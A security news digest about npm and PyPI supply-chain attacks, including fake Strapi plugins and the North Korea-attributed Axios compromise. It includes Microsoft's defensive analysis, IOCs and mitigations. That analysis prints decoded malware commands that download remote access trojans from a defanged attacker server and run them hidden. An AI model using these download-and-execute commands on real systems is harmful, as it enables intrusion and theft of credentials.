Security Briefing // 2026-04-05

Cybersecurity researchers have discovered 36 malicious packages in the npm registry that are disguised as Strapi CMS plugins but come with different payloads to facilitate Redis and PostgreSQL exploitation, deploy reverse shells, harvest credentials, and drop a persistent implant. "Every package contains three files (package.json, index.js, postinstall.js), has no description, repository, or homepage, and uses version 3.6.8 to appear as a mature Strapi v3 community plugin," SafeDep [said](https://safedep.io/malicious-npm-strapi-plugin-events-c2-agent/). All identified npm packages follow the same naming convention, starting with "strapi-plugin-" and then phrases like "cron," "database," or "server" to fool unsuspecting developers into downloading them. It's worth noting that the official Strapi plugins are scoped under "@strapi/." The packages, uploaded by four sock puppet accounts "umarbek1233," "kekylf12," "tikeqemif26," and "umar_bektembiev1" over a period of 13 hours, are listed below - - strapi-plugin-cron - strapi-plugin-config - strapi-plugin-server - strapi-plugin-database - strapi-plugin-core - strapi-plugin-hooks - strapi-plugin-monitor - strapi-plugin-events - strapi-plugin-logger - strapi-plugin-health - strapi-plugin-sync - strapi-plugin-seed - strapi-plugin-locale - strapi-plugin-form - strapi-plugin-notify - strapi-plugin-api - strapi-plugin-sitemap-gen - strapi-plugin-nordica-tools - strapi-plugin-nordica-sync - strapi-plugin-nordica-cms - strapi-plugin-nordica-api - strapi-plugin-nordica-recon - strapi-plugin-nordica-stage - strapi-plugin-nordica-vhost - strapi-plugin-nordica-deep - strapi-plugin-nordica-lite - strapi-plugin-nordica - strapi-plugin-finseven - strapi-plugin-hextest - strapi-plugin-cms-tools - strapi-plugin-content-sync - strapi-plugin-debug-tools - strapi-plugin-health-check - strapi-plugin-guardarian-ext - strapi-plugin-advanced-uuid - strapi-plugin-blurhash An analysis of the packages reveals that the malicious code is embedded within the postinstall script hook, which gets executed on "npm install" without requiring any user interaction. It runs with the same privileges as those of the installing user, meaning it abuses root access within CI/CD environments and Docker containers. The evolution of the payloads distributed as part of the campaign is as follows - - Weaponize a locally accessible Redis instance for remote code execution by injecting a crontab (aka cron table) entry to download and execute a shell script from a remote server every minute. The shell script writes a PHP web shell and Node.js reverse shell via SSH to Strapi's public uploads directory. It also attempts to scan the disk for secrets (e.g., Elasticsearch and cryptocurrency wallet seed phrases) and exfiltrate a Guardarian API module. - Combine Redis exploitation with Docker container escape to write shell payloads to the host outside the container. It also launches a direct Python reverse shell on port 4444 and writes a reverse shell trigger into the application’s node_modules directory via Redis. - Deploy a reverse shell and write a shell downloader via Redis and execute the resulting file. - Scan the system for environment variables and PostgreSQL database connection strings. - An expanded credential harvester and reconnaissance payload to gather environment dumps, Strapi configurations, Redis database extraction by running the INFO, DBSIZE, and KEYS commands, network topology mapping, and Docker/Kubernetes secrets, cryptographic keys, and cryptocurrency wallet files. - Conduct PostgreSQL database exploitation by connecting to the target's PostgreSQL database using hard-coded credentials and querying Strapi-specific tables for secrets. It also dumps matching cryptocurrency-related patterns (e.g., wallet, transaction, deposit, withdraw, hot, cold, and balance) and attempts to connect to six Guardarian databases. This indicates that the threat actor is already in possession of the data, obtained either via a prior compromise or through some other means. - Deploy a persistent implant designed to maintain remote access to a specific hostname ("prod-strapi"). - Facilitate credential theft by scanning hard-coded paths and spawning a persistent reverse shell. "The eight payloads show a clear narrative: the attacker started aggressively (Redis RCE, Docker escape), found those approaches weren't working, pivoted to reconnaissance and data collection, used hardcoded credentials for direct database access, and finally settled on persistent access with targeted credential theft," SafeDep said. The nature of the payloads, combined with the focus on digital assets and the use of hard-coded database credentials and hostname, raises the possibility that the campaign was a targeted attack against a cryptocurrency platform. Users who have installed any of the aforementioned packages are advised to assume compromise and rotate all credentials. The discovery coincides with the discovery of several supply chain attacks targeting the open-source ecosystem - - A GitHub account named " [ezmtebo](https://safedep.io/prt-scan-github-actions-exfiltration-campaign/)" has submitted over 256 pull requests across various open-source repositories containing a credential exfiltration payload. "It steals secrets through CI logs and PR comments, injects temporary workflows to dump secret values, auto-applies labels to bypass pull_request_target gates, and runs a background /proc scanner for 10 minutes after the main script exits," SafeDep said. - A hijack of " [dev-protocol](https://www.stepsecurity.io/blog/malicious-polymarket-bot-hides-in-hijacked-dev-protocol-github-org-and-steals-wallet-keys)," a verified GitHub organization, to distribute malicious Polymarket trading bots with typosquatted npm dependencies ("ts-bign" and "levex-refa" or "big-nunber" and "lint-builder") that steal wallet private keys, exfiltrate sensitive files, and open an SSH backdoor on the victim's machine. While "levex-refa" functions as a credential stealer, "lint-builder" installs the SSH backdoor. Both "ts-bign" and "big-nunber" are designed to deliver "levex-refa" and "lint-builder," respectively, as a transitive dependency. - A compromise of the popular Emacs package, " [kubernetes-el/kubernetes-el](https://www.stepsecurity.io/blog/kubernetes-el-compromised-how-a-pwn-request-exploited-a-popular-emacs-package)," that exploited the[Pwn Request vulnerability](https://thehackernews.com/2026/03/unc6426-exploits-nx-npm-supply-chain.html)in its GitHub Actions workflow by using the pull_request_target trigger to steal the repository's GITHUB_TOKEN, exfiltrate CI/CD secrets, deface the repository, and inject destructive code to delete nearly all repository files. - A compromise of the legitimate " [xygeni/xygeni-action](https://www.stepsecurity.io/blog/xygeni-action-compromised-c2-reverse-shell-backdoor-injected-via-tag-poisoning)" GitHub Actions workflow using stolen maintainer credentials to plant a reverse shell backdoor. Xygeni has since[implemented new security controls](https://xygeni.io/blog/security-incident-report-xygeni-action-github-action-compromise/)to address the incident. - A compromise of the legitimate npm package, " [mgc](https://safedep.io/malicious-npm-mgc-compromised-rat/)," by means of an account takeover to push four malicious versions (1.2.1 through 1.2.4) containing a dropper script that detects the operating system and fetches a platform-specific payload – a Python trojan for Linux and a PowerShell variant for Windows called WAVESHAPER.V2 – from a GitHub Gist. The attack[shares direct overlap](https://thehackernews.com/2026/04/unc1069-social-engineering-of-axios.html)with the recent supply chain attack targeting Axios, which has been attributed to a North Korean threat cluster tracked as UNC1069. - A malicious npm package named " [express-session-js](https://safedep.io/malicious-npm-package-express-session-js/)" that typosquats "express-session" and contains a dropper that retrieves a next-stage remote access trojan (RAT) from JSON Keeper to conduct data theft and persistent access by connecting to "216.126.237[.]71" using the Socket.IO library. - A compromise of the legitimate PyPI package, " [bittensor-wallet](https://www.stepsecurity.io/blog/bittensor-wallet-4-0-2-compromised-on-pypi---backdoor-exfiltrates-private-keys)" (version 4.0.2), to deploy a backdoor that's triggered during a wallet decryption operation to exfiltrate wallet keys using HTTPS, DNS tunneling, and Raw TLS as exfiltration channels to either a hard-coded domain or one created using a Domain Generation Algorithm (DGA) that's rotated daily. - A malicious PyPI package named " [pyronut](https://www.endorlabs.com/learn/malicious-pyronut-package-backdoors-telegram-bots-with-remote-code-execution)" that typosquats "pyrogram," a popular Python Telegram API framework, to embed a stealthy backdoor that's triggered every time a Telegram client starts and seize control of the Telegram session and the underlying host system. "The backdoor registers hidden Telegram message handlers that allow two hardcoded attacker-controlled accounts to execute arbitrary Python code (via the /e command and the meval library) and arbitrary shell commands (via the /shell command and subprocess) on the victim's machine," Endor Labs said. - A set of three malicious Microsoft Visual Studio Code (VS Code) extensions published by " [IoliteLabs](https://www.stepsecurity.io/blog/malicious-iolitelabs-vscode-extensions-target-solidity-developers-on-windows-macos-and-linux-with-backdoor)" – "solidity-macos," "solidity-windows," and "solidity-linux" – that were originally dormant since 2018 but were updated on March 25, 2026, to launch a multi-stage backdoor targeting Windows and macOS systems upon launching the application to establish persistence. Collectively, the extensions had 27,500 installs prior to them being removed. - Multiple versions of the " [KhangNghiem/fast-draft](https://www.aikido.dev/blog/fast-draft-open-vsx-bloktrooper)" VS Code extension on Open VSX (0.10.89, 0.10.105, 0.10.106, and 0.10.112) that execute a GitHub-hosted downloader to deploy a second-stage Socket.IO RAT, an information stealer, a file exfiltration module, and a clipboard monitor from a GitHub repository. Interestingly, versions 0.10.88, 0.10.111, and 0.10.129-135 have been found to be clean. "That is not the release pattern you expect from a single compromised build or a maintainer who has fully switched to malicious behavior," Aikido said. "It looks more like two competing release streams sharing the same publisher identity." In a report published in February 2026, Group-IB revealed that software supply chain attacks have become "the dominant force reshaping the global cyber threat landscape," adding that threat actors are going after trusted vendors, open-source software, SaaS platforms, browser extensions, and managed service providers to gain inherited access to hundreds of downstream organizations. The supply chain threat can rapidly escalate a single localized intrusion into something that has a large-scale, cross-border impact, with attackers industrializing supply chain compromises and turning it into a "self-reinforcing" ecosystem, as it offers reach, speed, and stealth. "Package repositories such as npm and PyPI have become prime targets, stolen maintainer credentials, and automated malware worms to compromise widely used libraries – turning development pipelines into large-scale distribution channels for malicious code," Group-IB [said](https://www.group-ib.com/media-center/press-releases/htct-2026-supply-chain/) [Google News](https://news.google.com/publications/CAAqLQgKIidDQklTRndnTWFoTUtFWFJvWldoaFkydGxjbTVsZDNNdVkyOXRLQUFQAQ),

The maintainers of the popular Axios HTTP client have published a detailed post-mortem describing how one of its developers was targeted by a social engineering campaign believed to have been conducted by North Korean threat actors. [...] [Full content could not be extracted. Visit source for details.]

The maintainer of the Axios npm package has confirmed that the supply chain compromise was the result of a highly-targeted social engineering campaign orchestrated by North Korean threat actors tracked as [UNC1069](https://thehackernews.com/2026/04/google-attributes-axios-npm-supply.html). Maintainer Jason Saayman said the attackers tailored their social engineering efforts "specifically to me" by first approaching him under the guise of the founder of a legitimate, well-known company. "They had cloned the company's founders' likeness as well as the company itself," Saayman [said](https://github.com/axios/axios/issues/10636) in a post-mortem of the incident. "They then invited me to a real Slack workspace. This workspace was branded to the company's CI and named in a plausible manner. The Slack [workspace] was thought out very well; they had channels where they were sharing LinkedIn posts." Subsequently, the threat actors are said to have scheduled a meeting with him on Microsoft Teams. Upon joining the fake call, he was presented with a fake error message that stated "something on my system was out of date." As soon as the update was triggered, the attack led to the deployment of a remote access trojan. The access afforded by the trojan enabled the attackers to steal the npm account credentials necessary to publish two trojanized versions of the Axios npm package (1.14.1 and 0.30.4) containing an implant named WAVESHAPER.V2. "Everything was extremely well coordinated, looked legit, and was done in a professional manner," Saayman added. The attack chain described by the project maintainer shares [considerable overlaps](https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html) with tradecraft associated with UNC1069 and BlueNoroff. Details of the campaign were extensively documented by [Huntress](https://thehackernews.com/2025/06/bluenoroff-deepfake-zoom-scam-hits.html) and [Kaspersky](https://thehackernews.com/2025/10/researchers-expose-ghostcall-and.html) last year, with the latter tracking it under the moniker GhostCall. | Source: Kaspersky | In these attacks, users are displayed an error message seconds after joining the call, stating that their system is not functioning properly and instructing them to download a malicious Zoom or Teams SDK through a [ClickFix](https://thehackernews.com/2025/08/clickfix-malware-campaign-exploits.html)-like pop-up message. Depending on the operating system of the victim, this action leads to the execution of an AppleScript (for macOS) or a PowerShell (for Windows) script. One of the malicious payloads deployed as part of the attack chain is a Nim-based macOS backdoor (or a Go variant written for Windows) called CosmicDoor that delivers a comprehensive stealer suite dubbed SilentSiphon to capture credentials from web browsers and password managers, and secrets associated with GitHub, GitLab, Bitbucket, npm, Yarn, Python pip, RubyGems, Rust argo, and .NET NuGet. As [detailed](https://thehackernews.com/2026/04/unc1069-social-engineering-of-axios.html) by Google-owned Mandiant in February 2026, some of these attacks have also have paved the way for the deployment of a C++ malware called WAVESHAPER, which then serves as a conduit for additional downloaders, backdoors, and information stealers like HYPERCALL, SUGARLOADER, HIDDENCALL, SILENCELIFT, and DEEPBREATH, and CHROMEPUSH. "Historically, [...] these specific guys have gone after crypto founders, VCs, public people," security researcher Taylor Monahan said. "They [social engineer](https://fortune.com/2026/04/02/north-korea-dprk-zoom-phishing-social-engineering-attack-telegram/) them and take over their accounts and target the next round of people. This evolution to targeting [OSS maintainers] is a bit concerning in my opinion." As preventive steps, Saayman has outlined several changes, including resetting all devices and credentials, setting up immutable releases, adopting OIDC flow for publishing, and updating GitHub Actions to adopt best practices. The findings demonstrate how open-source project maintainers are increasingly becoming the target of sophisticated attacks, effectively allowing threat actors to target downstream users at scale by publishing poisoned versions of highly popular packages. With Axios attracting nearly 100 million weekly downloads and being used heavily across the JavaScript ecosystem, the blast radius of such a supply chain attack can be massive as it propagates swiftly through direct and transitive dependencies. "A package as widely used as Axios being compromised shows how difficult it is to reason about exposure in a modern JavaScript environment," Socket's Ahmad Nassri [said](https://socket.dev/blog/hidden-blast-radius-of-the-axios-compromise#Why-the-Blast-Radius-Is-Larger-Than-It-Looks). "It is a property of how dependency resolution in the ecosystem works today." Axios Attack Part of Broader, Coordinated Campaign In a follow-up analysis published on Friday, Socket [said](https://socket.dev/blog/attackers-hunting-high-impact-nodejs-maintainers) several maintainers across the Node.js ecosystem come forward to maintainers across the Node.js ecosystem, indicating that high-impact, open-source project maintainers were unsuccessfully targeted as part of what has been described as a coordinated social engineering campaign. "The attack chain: build rapport over weeks, schedule a video call, fake an audio error, prompt the target to install a 'fix.'" Socket CEO Feross Aboukhadijeh [said](https://x.com/feross/status/2040182994699473106). "That fix is a RAT. Once it's on your machine, they have your .npmrc tokens, browser sessions, AWS creds, andKeychain. 2FA doesn't matter. OIDC publishing doesn't matter. Game over." Targets included Socket's own engineers, [Jordan Harband](https://github.com/ljharb), who maintains ECMAScript polyfills and shims, and [John-David Dalton](https://github.com/jdalton), who is the creator of Lodash, a popular JavaScript utility library that offers methods to handle arrays, objects, and other types of data. Also targeted were Matteo Collina, the lead maintainer of Fastify, Pino, and Undici, Scott Motte, the creator of dotenv, and Pelle Wessman, who is a maintainer of mocha, neostandard, npm-run-all2, and type-fest. While initial contact with Collina was via a Slack message, Wessman was invited to participate in a podcast recording, as part of which he was instructed to join a video call that turned out to be a fake version of the Streamyard live recording platform. Once the call began, the bogus site displayed a "technically plausible error message" and prompted Wessman to download a native app to resolve it. When Wessman refused to run it, the North Korean threat actors switched tactics and asked him to run a curl command in the Terminal app. Having failed in this effort too, they erased all conversations and went dark. In another case documented by Jean Burellier, a Node.js core collaborator and contributor to Express, the social engineering effort began with a LinkedIn message from the threat actors, posing as the representative of a company named Openfort. After the initial trust-building exercise, Burellier was invited to join two Slack workspaces. As soon as he joined, he was placed in a private channel with no other visible members and invited to join a fake Microsoft Teams call. From here, the attack chain mirrors that of what Huntress, Kaspersky, and Google documented, with the fake Teams page displaying a message to update the Teams SDK. When Burellier declined to install the update and suggested rescheduling the call, he was removed from the Slack workspaces, and the conversations were deleted. "The accounts now span some of the most widely depended-upon packages in the npm registry and Node.js core itself, and together they confirm that Axios was not a one-off target," the software supply chain security company said. "It was part of a coordinated, scalable attack pattern aimed at high-trust, high-impact open source maintainers." (The story was updated after publication on April 4, 2026, to reflect the latest developments.) [Google News](https://news.google.com/publications/CAAqLQgKIidDQklTRndnTWFoTUtFWFJvWldoaFkydGxjbTVsZDNNdVkyOXRLQUFQAQ),

TL;DR: ntlmrelayx‘s SOCKS proxy works great for SMB and MSSQL but fails when you try to browse a web application through it – I dug into why, found several fundamental issues with how it handles HTTP, built ghostsurf to fix them, and along the way, discovered (and circumvented) some undocumented Windows kernel auth behavior. ghostsurf […]

The post ghostsurf: From NTLM Relay to Browser Session Hijacking appeared first on SpecterOps.

[Full content could not be extracted. Visit source for details.]

On March 31, 2026, two new npm packages for updated versions of Axios, a popular HTTP client for JavaScript that simplifies making HTTP requests to a REST endpoint with over 70 million weekly downloads, were identified as malicious. These versions (1.14.1 and 0.30.4) were injected with a malicious dependency to download payloads from known actor command and control (C2). Microsoft Threat Intelligence has attributed this infrastructure and the Axios npm compromise to Sapphire Sleet, a North Korean state actor. Following successful connection to the malicious C2, a second-stage remote access trojan (RAT) payload was automatically deployed based on the operating system of the compromised device, including macOS, Windows, and Linux. This activity follows the pattern of recent high-profile [supply chain attacks](https://www.microsoft.com/en-us/security/blog/2026/03/24/detecting-investigating-defending-against-trivy-supply-chain-compromise/), where other adversaries poison widely adopted open-source frameworks and their distribution channels to achieve broad downstream impact. Users who have installed Axios version 1.14.1 or 0.30.4 should rotate their secrets and credentials immediately and downgrade to a safe version (1.14.0 or 0.30.3). Users should also follow the [mitigation and protection guidance](#mitigation-and-protection-guidance) provided in this blog, including disabling auto-updates for Axios npm packages, since the malicious payload includes a hook that will continue to attempt to update. This blog shares Microsoft Threat Intelligence’s findings from our analysis, [Microsoft Defender detections](#microsoft-defender-detections) in place that alerted and protected our customers, additional protections we have implemented in our products to detect and block malicious components, and suggested mitigations for organizations to prevent further compromise. Analysis of the attack On March 31, 2026, two malicious versions of Axios npm packages were released. These packages connected to a known malicious domain (C2) owned by Sapphire Sleet to retrieve a second-stage remote access trojan (RAT). Since Axios packages are commonly auto-updated, any projects with Axios versions higher than axios@^1.14.0 or axios@^0.30.0 connected to this Sapphire Sleet C2 upon installation and downloaded second-stage malware. Windows, macOS, and Linux systems are all targeted with platform-specific payloads. Microsoft Threat Intelligence has determined the account that created the plain-crypto-js package is associated with Sapphire Sleet infrastructure. That account has been disabled. Silent install-time code execution using dependency insertion The updated versions of Axios inject plain-crypto-js@4.2.1, a fake runtime dependency that executes automatically through post-install with no user interaction required. The trusted package’s application logic is not modified; instead, the threat actor added a dependency that is never imported by the package’s runtime code but only exists to trigger an install-time script to download the second-stage RAT. That means normal app behavior might remain unchanged while malicious activity occurs during npm installation or npm update on developer endpoints and continuous integration and continuous delivery (CI/CD) systems. The dependency is seeded into a clean release (plain-crypto-js@4.2.0) to establish publishing history and reduce scrutiny. A follow‑up release adds the malicious install-time logic (plain-crypto-js@4.2.1), introducing an install hook that runs node setup.js and includes a clean manifest stub (package.md) intended for later replacement. Two Axios releases are then published with a surgical manifest-only change: axios@1.14.1 and axios@0.30.4 add plain-crypto-js@^4.2.1 as a dependency while leaving Axios source code unchanged. The publication metadata differs from the project’s normal CI-backed publishing pattern (for example, missing trusted publisher binding and missing corresponding repo tag/commit trail for the malicious version). Execution on compromised environments The first-stage loader (setup.js) uses layered obfuscation to reconstruct sensitive strings (module names, platform identifiers, file paths, and command templates) at runtime. A developer or CI job runs npm install axios (or a dependency install/update that resolves to the affected versions). The package manager resolves and installs the injected dependency (plain-crypto-js@4.2.1). During installation, the dependency’s lifecycle script automatically launches node setup.js (no additional user step required), which decodes embedded strings at runtime, identifies the platform, and connects to hxxp://sfrclak[.]com:8000/6202033 to fetch the next stage. Single endpoint C2 with OS-specific responses The package connects to a Sapphire Sleet-owned domain (hxxp://sfrclak[.]com), which fetches a second-stage payload from an actor-controlled server running on port 8000. The associated IP address (142.11.206[.]73) is tied to Hostwinds, a virtual private server (VPS) provider that Sapphire Sleet is known to commonly use when establishing C2. All platforms connect to the same resource over the same path (hxxp://sfrclak[.]com:8000/6202033), and the OS selection is conveyed through POST bodies packages.npm.org/product0|product1|product2. This enables the operator to serve platform-specific payloads from one route while keeping the client-side logic minimal. On Windows, the malicious npm drops a VBScript stager. On macOS, the malicious npm package drops a native binary. - macOS: packages.npm.org/product0 - Windows: packages.npm.org/product1 - Linux/other: packages.npm.org/product2 Second-stage delivery and execution mechanics by OS macOS (Darwin) On macOS, the RAT is identified as a native binary: com.apple.act.mond. Setup.js writes an AppleScript into a temp location and runs it silently using nohup osascript … &. AppleScript POSTs packages.npm.org/product0 to hxxp://sfrclak[.]com:8000/6202033, downloads a binary to /Library/Caches/com.apple.act.mond, applies chmod 770, then starts it using /bin/zsh in the background. node setup.js └─ sh -c 'curl -o /Library/Caches/com.apple.act.mond | The AppleScript is removed afterward; the durable artifact is typically Library/Caches/com.apple.act.mond. - SHA-256: 92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a Observed macOS command (as decoded): sh -c 'curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s hxxp://sfrclak[.]com:8000/6202033 && chmod 770 /Library/Caches/com.apple.act.mond && /bin/zsh -c "/Library/Caches/com.apple.act.mond hxxp://sfrclak[.]com:8000/6202033 &" &> /dev/null' | Windows On Windows, the RAT is identified as a PowerShell: 6202033.ps1. - SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c - SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 node.exe setup.js ← npm post-install hook └─ drops: %TEMP%\6202033.vbs ← VBScript stager | On first execution, the PowerShell RAT creates %PROGRAMDATA%\system.bat and adds a registry run key at HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate to enable re-fetching of RAT after every reboot. This added registry run key can persist after reboot. - SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd The chain locates PowerShell (using where powershell) then copies and renames the PowerShell into %PROGRAMDATA%\wt.exe (masquerading as a benign-looking executable name). It writes a VBScript in %TEMP% and runs it using cscript //nologo to keep user-facing windows hidden. The VBScript launches hidden cmd.exe to POST packages.npm.org/product1 to hxxp://sfrclak[.]com:8000/6202033, saves the response to a temp .ps1, executes it with hidden window and execution-policy bypass, then deletes the .ps1. The temporary .vbs is also removed; the durable artifact is often %PROGRAMDATA%\wt.exe. Observed Windows command (as decoded): "cmd.exe" /c curl -s -X POST -d "packages.npm.org/product1" "hxxp://sfrclak[.]com:8000/6202033" > "C:\Users\\AppData\Local\Temp\6202033.ps1" & "C:\ProgramData\wt.exe" -w hidden -ep bypass -file "C:\Users\\AppData\Local\Temp\6202033.ps1" "hxxp://sfrclak[.]com:8000/6202033" & del "C:\Users\\AppData\Local\Temp\6202033.ps1" /f | Linux/others On Linux, the RAT is identified as a Python payload: ld.py. - SHA-256: fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf A Python payload is written to /tmp/ld.py and launched detached using nohup python3 … &, suppressing output (> /dev/null 2>&1). node setup.js └─ /bin/sh -c "curl -o /tmp/ld.py | Setup.js executes a shell one-liner to POST packages.npm.org/product2 to hxxp://sfrclak[.]com:8000/6202033. The response is saved as /tmp/ld.py and executed in the background using nohup python3 /tmp/ld.py hxxp://sfrclak[.]com:8000/6202033 … &. /tmp/ld.py remains a key on-disk indicator in typical flows. Observed Linux/Unix command (as decoded): /bin/sh -c "curl -o /tmp/ld.py -d packages.npm.org/product2 -s hxxp://sfrclak[.]com:8000/6202033 && nohup python3 /tmp/ld.py hxxp://sfrclak[.]com:8000/6202033 > /dev/null 2>&1 &" | Post-execution defense evasion After launching the second-stage payload, the installer logic removes its own loader (setup.js) and removes the manifest (package.json) that contained the install trigger. It then renames package.md to package.json, leaving behind a clean-looking manifest to reduce the chance that post-incident inspection of node_modules reveals the original install hook. RAT deployment as covert remote management The Windows RAT is a PowerShell script that functions as a covert remote management component designed to persist on Windows systems and maintain continuous contact with an external command server. When executed, it generates a unique host identifier, collects detailed system and hardware information (including OS version, boot time, installed hardware, and running processes), and establishes persistence by creating a hidden startup entry that re-launches the script at user sign in under the guise of a legitimate update process. The RAT communicates with the remote server using periodic, encoded HTTP POST requests that blend in with benign traffic patterns, initially sending host inventory and then polling for follow‑on instructions. Supported commands allow the remote threat actor to execute arbitrary PowerShell code, enumerate files and directories across the system, inject additional binary payloads directly into memory, or terminate execution on demand. To reduce forensic visibility, the script favors in‑memory execution, temporary files, and Base64‑encoded payloads, enabling flexible control of the compromised system while minimizing on‑disk artifacts. Who is Sapphire Sleet? Sapphire Sleet is a North Korean state actor that has been active since at least March 2020. The threat actor focuses primarily on the finance sector, including cryptocurrency, venture capital, and blockchain organizations. These targets are often global, with a particular interest in the United States, as well as countries in Asia and the Middle East. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms. Sapphire Sleet often leverages social networking sites, such as LinkedIn, to initiate contact by directing users to click links, leading to malicious files hosted on attacker-controlled cloud storage services such as OneDrive or Google Drive, using domains masquerading as financial institutions like United States-based banks or cryptocurrency pages, and fraudulent meeting links that impersonate legitimate video conferencing applications, such as Zoom. Sapphire Sleet overlaps with activity tracked by other security vendors as UNC1069, STARDUST CHOLLIMA, Alluring Pisces, BlueNoroff, CageyChameleon, or CryptoCore. Mitigation and protection guidance In organizations where the security posture of npm packages might require review of updates prior to deployment, disabling auto-upgrade features is strongly encouraged. In package.json, remove use of caret (^) or tilde (~) which allow auto-upgrade of any minor or patch update up to a major version. Instead, use an exact version and handle upgrades manually. What to do now if you’re affected For organizations affected by this attack, Microsoft Threat Intelligence recommends the following steps: - Roll back all deployments of Axios to safe versions (1.14.0 or 0.30.3 or earlier). - Use overrides to force pinned versions for transitive dependencies. - Flush the local cache with “npm cache clean –force“. - Disable or restrict automated dependency bots for critical packages. - Adopt Trusted Publishing with OIDC to eliminate stored credentials. - Review your CI/CD pipeline logs for any npm install executions that might have updated to axios@1.14.1 or axios@0.30.4 or presence of plain-crypto-js in your npm install / npm ci outputs. - Look for outbound connections in network egress traffic to sfrclak[.]com or 142.11.206[.]72 on port 8000. - Developer machines: Search home directory for any node_modules folder containing plain-crypto-js or axios@1.14.1 or axios@0.30.4. - Rotate all secrets and credentials that are exposed to compromised systems. - When possible, ignore postinstall scripts. If the scenario allows, use “npm ci –ignore-scripts” to prevent postinstall hooks from running or disable postinstall scripts by default with “npm config set ignore-scripts true”. - Remove all Axios files/code from the victim systems and re-install cleanly. Defending against the Axios supply chain attack Microsoft Threat Intelligence recommends the following mitigation measures to protect organizations against this threat. - Fully stop Axios from being upgraded unless you explicitly choose to upgrade – In package.json, remove ^ or ~ (which allows auto-upgrade of any minor or patch update) and use an exact version. NOTE: With this change, versions never upgrade unless you change them manually: { "dependencies": { "axios": "1.14.0" } } `` | - Block Axios upgrades even if a transitive dependency tries – If Axios appears indirectly, force a version using overrides (npm ≥ 14). This forces all dependencies to use the pinned version, which is especially useful for security incidents. NOTE: With this change, versions never upgrade unless you change them manually: { "overrides": { "axios": "1.14.0" } } `` | - Disable automated dependency bots (such as Dependabot or Renovate) by disabling or restricting Axios updates in their config to prevent PR‑based auto‑updates, which are often mistaken for npm behavior: # Dependabot example ignore: - dependency-name: "axios" | - Check for malicious Axios versions in the organization to ensure that workflows and systems don’t use compromised Axios versions (1.14.1 and 0.30.4). - Assess the potential blast radius from affected endpoints - The Exposure Management graph provides a unified representation of organizational assets and their relationships, including identities, endpoints, cloud resources and secrets. This graph is also exposed to customers through Advanced Hunting in Microsoft Defender, enabling programmatic exploration of these connections. - Using advanced hunting, security teams can query this graph to assess the potential blast radius of any given node, such as a server affected by the RAT. By understanding which assets are reachable through existing permissions and trust relationships, organizations can prioritize remediation of the most critical exposure paths. - Additional examples and query patterns are available here as well as in the hunting queries section. Microsoft Defender detections [Microsoft Defender](https://www.microsoft.com/security/business/microsoft-defender) customers can refer to the list of applicable detections below. Durable detections that were already in place alerted and protected customers from this attack. We have also released additional protections to detect and block specific malicious components. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog. | Tactic | Observed activity | Microsoft Defender coverage (Blocking detections are indicated where applicable and mapped to specific IoCs, components, or TTPs.) | | Initial Access, Execution | The postinstall script downloads the payload from the attacker-controlled server. | Microsoft Defender for Cloud – Malicious Axios supply chain activity detected | | Initial execution script was included in setup.js – plain-crypto-js-4.2.1.tgz and is responsible for launching the malicious chain during install or first run | Microsoft Defender for Endpoint – Trojan:Script/SuspObfusRAT.A (Blocking) | | | Initial execution script setup.js was responsible for launching the malicious chain during install or first run | Microsoft Defender for Endpoint – TrojanDownloader:JS/Crosdomd.A (Blocking) | | | Maliciously packaged crypto library plain-crypto-js@4.2.1 used to execute or support attacker‑controlled logic in a supply‑chain compromise. | Microsoft Defender for Endpoint – Trojan:JS/AxioRAT.DA!MTB (Blocking) | | | Execution (macOS) | macOS persistence artifact /Library/Caches/com.apple.act.mond launched, masquerading as a legitimate Apple component to maintain stealthy execution. | Microsoft Defender for Endpoint – Trojan:MacOS/Multiverze!rfn (Blocking) – Backdoor:MacOS/TalonStrike.A!dha (Blocking) – Backdoor:MacOS/Crosdomd.A (Blocking) – Behavior:MacOS/SuspNukeSpedExec.B (Blocking) – Behavior:MacOS/SuspiciousActivityGen.AE (Blocking) | | Download and execution of payload | Microsoft Defender for Endpoint – Trojan:Script/SuspObfusRAT.A (Blocking) – Trojan:JS/AxioRAT.DA!MTB (Blocking) – Trojan:MacOS/Multiverze!rfn (Blocking) – Behavior:MacOS/SuspNukeSpedExec.B – Behavior:MacOS/SuspiciousActivityGen.AE – Process launched in the background – Suspicious AppleScript activity – Suspicious script launched – Suspicious shell command execution – Suspicious file or content ingress – Executable permission added to file or directory – Suspicious file dropped and launched | | | Execution (Linux) | Download and execution of payload, /tmp/ld.py, a Python loader/downloader used to fetch, decrypt, or launch additional malicious components. | Microsoft Defender for Endpoint – Trojan:Python/TalonStrike.C!dha (Blocking) – Backdoor:Python/TalonStrike.C!dha (Blocking) | | Download and execution of payload | Microsoft Defender for Endpoint – Trojan:Python/TalonStrike.C!dha (Blocking) – Process launched in the background – Suspicious communication with a remote target | | | Execution (Windows) | Observed artifacts, 6202033.ps1 and system.bat, provided attackers persistent remote access, command execution, and follow‑on payload delivery on Windows system | Microsoft Defender for Endpoint – TrojanDownloader:PowerShell/Powdow.VUE!MTB (Blocking) – Trojan:Win32/Malgent (Blocking) – TrojanDownloader:PowerShell/Crosdomd.B (Blocking) – TrojanDownloader:PowerShell/Crosdomd.A (Blocking) – TrojanDownloader:BAT/TalonStrike.F!dha (Blocking) – Backdoor:PowerShell/TalonStrike.B!dha (Blocking) | | Download and execution of payload, 6202033.ps1. | Microsoft Defender for Endpoint – TrojanDownloader:PowerShell/Powdow.VUE!MTB (Blocking) – Trojan:Win32/Malgent (Blocking) – Behavior:Win32/PSMasquerade.A – Suspicious ASEP via registry key – System executable renamed and launched – Possible initial access from an emerging threat | | | Defense evasion (macOS) | Removal of indicators | Microsoft Defender for Endpoint – Suspicious path deletion | | Command and control | Use of the following network indicators for C2 communications: C2 domain: sfrclak[.]com C2 IP: 142.11.206[.]73 C2 URL: hxxp://sfrclak[.]com:8000/6202033 | 